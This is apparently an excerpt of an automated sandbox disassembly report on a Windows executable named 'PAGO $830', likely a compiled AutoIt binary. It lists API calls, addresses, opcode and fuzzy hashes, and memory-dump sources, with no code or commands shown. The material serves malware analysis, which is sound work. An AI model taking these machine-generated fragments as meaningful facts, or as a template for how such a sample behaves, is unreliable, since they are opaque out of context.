                                                          • Opcode ID: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                                          • Instruction ID: b4de0aa82bb160b983338f78afff485406e29fadd4fbc3186c17fd9911da3a61
                                                          • Opcode Fuzzy Hash: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                                          • Instruction Fuzzy Hash: B2517A70600209DBDF20CF79D984AAEBBE5FF44328F29421BE842A7391DB719944CB71
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00DDC831
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 40c0d5a98aeb238fd7daf36c424da2f93be7b26fd85bce7537a46b14ecd4d9ba
                                                          • Instruction ID: 43d2231a03052673e4a81640452653e5111e52ca72597aef4958ecf13a07ec77
                                                          • Opcode Fuzzy Hash: 40c0d5a98aeb238fd7daf36c424da2f93be7b26fd85bce7537a46b14ecd4d9ba
                                                          • Instruction Fuzzy Hash: 0011D531668307BAEB019B649C82DAA6BDCDF15364F60503FF901E6382EBA1A941D578
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$LocalTime
                                                          • String ID:
                                                          • API String ID: 952045576-0
                                                          • Opcode ID: 9f94d6356e2ac97fe6fd9b17c2a45f25a72800302a51fe2033189ededed04ad0
                                                          • Instruction ID: 8db67992dd594d09cf98a3adb8e659ab93656296f0c357d984e1789b0d72feb0
                                                          • Opcode Fuzzy Hash: 9f94d6356e2ac97fe6fd9b17c2a45f25a72800302a51fe2033189ededed04ad0
                                                          • Instruction Fuzzy Hash: 7F414CA5D1021465CF11FBF8884AACFB7A9EF05310F508467E518E3262FA34E655C3FA
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00D8EF72
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00DCF0EE
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DCEEDF,00000004,00000000,00000000), ref: 00DCF171
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 5066566db313824b48cde04900765fec5b0de758c577c8ebca362c16b1bbe818
                                                          • Instruction ID: 38d5c590a29675827529ece0a3bb7221b6ac940cec74da004766d11851a5ad38
                                                          • Opcode Fuzzy Hash: 5066566db313824b48cde04900765fec5b0de758c577c8ebca362c16b1bbe818
                                                          • Instruction Fuzzy Hash: 7E41D831208741EED735AB3ADD88B6A7B92EF86310F1C451DE28657661C672E8C4DF31
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00E02C4E
                                                          • GetDC.USER32(00000000), ref: 00E02C56
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E02C61
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E02C6D
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E02CA9
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E02CBA
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E0599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00E02CF5
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E02D14
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 9522a1ff01cdc471aca85f0d46bfcae4889e0cf398540d6a992d4c6ff6a615b4
                                                          • Instruction ID: 06c18ea134f81ba88e5b5e09107b88c805ea4623ada07af7606005fb8f028631
                                                          • Opcode Fuzzy Hash: 9522a1ff01cdc471aca85f0d46bfcae4889e0cf398540d6a992d4c6ff6a615b4
                                                          • Instruction Fuzzy Hash: 4631AE72201210BFEB218F51DC89FEB3BADEF0A715F144155FE08AA2D1C6769C81CBA4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 2c521a4a03b62bad5539d3b7fa22e45fe14a4796831d5f605e09860d7e9d884c
                                                          • Instruction ID: 4138f128d0bc63afb68542d6cc68f51f76c2a1e360a383ae3e1aa595e50dfad4
                                                          • Opcode Fuzzy Hash: 2c521a4a03b62bad5539d3b7fa22e45fe14a4796831d5f605e09860d7e9d884c
                                                          • Instruction Fuzzy Hash: 49210A61600B057BE716A910BD42FAF737DDE01354F581422FD04A6B89E710EE20C6B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 16b8028f0ff2f571fba166d788f18e76d17410b886142f97e6e9b99d21956176
                                                          • Instruction ID: 1e0f1f34cef9cd8e44e5999280f3e3d777a03063bd3d9548d4291f498a59cceb
                                                          • Opcode Fuzzy Hash: 16b8028f0ff2f571fba166d788f18e76d17410b886142f97e6e9b99d21956176
                                                          • Instruction Fuzzy Hash: F7D18E71A0060AAFDF10CF98D881ABEB7B5BF48304F15C169EA15AB285E771ED45CB60
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00DB156E
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB15F1
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00DB179B,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB1684
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB169B
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB1717
                                                          • __freea.LIBCMT ref: 00DB1742
                                                          • __freea.LIBCMT ref: 00DB174E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 2829977744-0
                                                          • Opcode ID: 4ab72975bc69901feb6876ae662e0acf94ba831526c25a8d4c78872409d2cd01
                                                          • Instruction ID: 5b2efb7de5b5dd189d7685e73a53afc19128645c4164eca07b6e0876beb1ea66
                                                          • Opcode Fuzzy Hash: 4ab72975bc69901feb6876ae662e0acf94ba831526c25a8d4c78872409d2cd01
                                                          • Instruction Fuzzy Hash: 0691BF7AA00216DADF208E65C861EEEBBF5EB49710FA84169E807E7141DB35DC448BB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 197933656ee276d1b8e216167c15917a14284f1ea83dadb8db315271630f91a4
                                                          • Instruction ID: 81e2d042cbb0bcb9cce2c0e12eb677d716a0f0fc0a228d4587aa1e2e4c425549
                                                          • Opcode Fuzzy Hash: 197933656ee276d1b8e216167c15917a14284f1ea83dadb8db315271630f91a4
                                                          • Instruction Fuzzy Hash: 4991357194020AAFDB14DFA9CD84AEEBBB8FF48320F25815AE512B7251D374A941CF70
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(?,?), ref: 00DE117A
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DE11A2
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DE11C6
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE11F6
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE127D
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE12E2
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE134E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                          • String ID:
                                                          • API String ID: 2550207440-0
                                                          • Opcode ID: fc705660b2616914780bcf9e1200f9ff76e410902f4116a109940f9ac94dd2f6
                                                          • Instruction ID: 2c1c63db99910ad22c85f338109d673af6ac82ef33039cf6b51627e527cf7937
                                                          • Opcode Fuzzy Hash: fc705660b2616914780bcf9e1200f9ff76e410902f4116a109940f9ac94dd2f6
                                                          • Instruction Fuzzy Hash: 8C91DE79B00259AFDB00AF9AC885BBEB7B5FF04314F144029EA51EB291D774A944CBB0
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DF3892
                                                          • CharUpperBuffW.USER32(?,?), ref: 00DF39A1
                                                          • _wcslen.LIBCMT ref: 00DF39B1
                                                          • VariantClear.OLEAUT32(?), ref: 00DF3B46
                                                            • Part of subcall function 00DE0BFD: VariantInit.OLEAUT32(00000000), ref: 00DE0C3D
                                                            • Part of subcall function 00DE0BFD: VariantCopy.OLEAUT32(?,?), ref: 00DE0C46
                                                            • Part of subcall function 00DE0BFD: VariantClear.OLEAUT32(?), ref: 00DE0C52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4137639002-1221869570
                                                          • Opcode ID: 51f72b5ff384d71358d6af18b9404af5fe809e9a8e72d1f784578ed9b3c3abc6
                                                          • Instruction ID: cd6ebfc1b127337fcffd347d4c44a034ece0eb6de3fa275f3ed02cc2148a3ea1
                                                          • Opcode Fuzzy Hash: 51f72b5ff384d71358d6af18b9404af5fe809e9a8e72d1f784578ed9b3c3abc6
                                                          • Instruction Fuzzy Hash: 9B9166746083459FC710EF28C48092ABBE5FF88314F15892EF98A97351DB71EE45CBA2
                                                          APIs
                                                            • Part of subcall function 00DCFEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF14
                                                            • Part of subcall function 00DCFEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF2F
                                                            • Part of subcall function 00DCFEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF3D
                                                            • Part of subcall function 00DCFEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF4D
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DF4B78
                                                          • _wcslen.LIBCMT ref: 00DF4C80
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DF4CF6
                                                          • CoTaskMemFree.OLE32(?), ref: 00DF4D01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 614568839-2785691316
                                                          • Opcode ID: e7b3e4e383b18a60ce1af1ec0a5f0b7afa82055423f98e78ab45f4d82dd97d6d
                                                          • Instruction ID: 1dca32ed19f9aac97717994c67111b8acd90e0a2ed12078690df241c88d1e1bd
                                                          • Opcode Fuzzy Hash: e7b3e4e383b18a60ce1af1ec0a5f0b7afa82055423f98e78ab45f4d82dd97d6d
                                                          • Instruction Fuzzy Hash: 66910371D0121DAFDF10DFA4D891AEEBBB8EF08314F10816AE919A7251EB709A44CF70
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00E020B6
                                                          • GetMenuItemCount.USER32(00000000), ref: 00E020E8
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E02110
                                                          • _wcslen.LIBCMT ref: 00E02146
                                                          • GetMenuItemID.USER32(?,?), ref: 00E02180
                                                          • GetSubMenu.USER32(?,?), ref: 00E0218E
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E02216
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                          • String ID:
                                                          • API String ID: 4196846111-0
                                                          • Opcode ID: 2d427d86f83c6d4721d416d3092157c31209c516b6e87e135b65f12eb1ba61d8
                                                          • Instruction ID: fa1a569ffd1ac172dd1796818be1b895ac864ce14462f2881f92062caaf328a3
                                                          • Opcode Fuzzy Hash: 2d427d86f83c6d4721d416d3092157c31209c516b6e87e135b65f12eb1ba61d8
                                                          • Instruction Fuzzy Hash: C1717275A00205AFCB10DF65C849AAEB7F5EF48314F14845DEA16FB391DB35AD81CBA0
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00DDAE17
                                                          • GetKeyboardState.USER32(?), ref: 00DDAE2C
                                                          • SetKeyboardState.USER32(?), ref: 00DDAE8D
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DDAEBB
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DDAEDA
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DDAF1B
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DDAF3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                                          • Instruction ID: fc8153a4b0c6c574ae902aeaaf96a3de9f82353c493196248270e06bf8ddfe69
                                                          • Opcode Fuzzy Hash: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                                          • Instruction Fuzzy Hash: E751BDA06047D53DFB3643388845BBABEA95F06704F0CC98AF1D555AC2C7A9EC88D772
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00DDAC37
                                                          • GetKeyboardState.USER32(?), ref: 00DDAC4C
                                                          • SetKeyboardState.USER32(?), ref: 00DDACAD
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDACD9
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDACF6
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAD35
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAD56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                                          • Instruction ID: c6cc87e2e9a501df08fd5f870c1b0bf8fed468269acf255d6dd971cba25383f0
                                                          • Opcode Fuzzy Hash: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                                          • Instruction Fuzzy Hash: 6A5137A09147D13EFB32833C8C15B767E9AAB06300F0CC98AE0D546AD2D695EC88D772
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DA5B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DA5400
                                                          • __fassign.LIBCMT ref: 00DA547B
                                                          • __fassign.LIBCMT ref: 00DA5496
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DA54BC
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00DA5B33,00000000,?,?,?,?,?,?,?,?,?,00DA5B33,?), ref: 00DA54DB
                                                          • WriteFile.KERNEL32(?,?,00000001,00DA5B33,00000000,?,?,?,?,?,?,?,?,?,00DA5B33,?), ref: 00DA5514
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 1619470c785cf6cf6397d06e23a259cdcce91ac34af1643202db97130ea52e99
                                                          • Instruction ID: 0612483881ce9b4c2c23a7493081040cfa77ecb22fac4e8a2409f71d961bf430
                                                          • Opcode Fuzzy Hash: 1619470c785cf6cf6397d06e23a259cdcce91ac34af1643202db97130ea52e99
                                                          • Instruction Fuzzy Hash: 0F51D571E002499FCB10CFA9E845AEEBBF9EF0A300F14415AE956F7291D731DA45CB60
                                                          APIs
                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC72FC
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC730C
                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC7324
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC7345
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7354
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC7371
